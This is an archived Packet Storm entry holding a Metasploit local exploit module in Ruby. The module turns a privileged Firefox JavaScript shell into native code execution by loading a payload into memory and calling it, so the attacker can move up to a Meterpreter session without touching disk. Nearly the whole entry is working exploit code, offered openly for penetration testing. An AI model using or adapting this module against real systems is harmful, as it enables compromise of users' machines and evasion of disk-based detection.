Firefox Exec Shellcode From Privileged Javascript Shell

2014-03-13T00:00:00
ID PACKETSTORM:125704
Type packetstorm
Reporter joev
Modified 2014-03-13T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'msf/core/payload/firefox'  
  
class Metasploit3 < Msf::Exploit::Local  
  
include Msf::Payload::Firefox  
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',  
'Description' => %q{  
Allows execution of native payloads from a privileged Firefox Javascript shell.  
Puts the specified payload into memory, adds the necessary protection flags,  
and calls it. Useful for upgrading a Firefox javascript shell to a Meterpreter  
session without touching the disk.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'joev' ],  
'Platform' => [ 'firefox' ],  
'DisclosureDate' => 'Mar 10 2014',  
'Targets' => [  
[  
'Native Payload', {  
'Platform' => %w{ linux osx win unix },  
'Arch' => ARCH_ALL  
}  
]  
],  
'DefaultTarget' => 0  
))  
  
register_options([  
OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])  
], self.class)  
end  
  
def exploit  
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")  
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])  
print_warning(results) if results.present?  
end  
  
def js_payload  
%Q|  
(function(send){  
try {  
#{run_payload}  
send("Payload executed.");  
} catch (e) {  
send(e);  
}  
})(send);  
|.strip  
end  
end  
`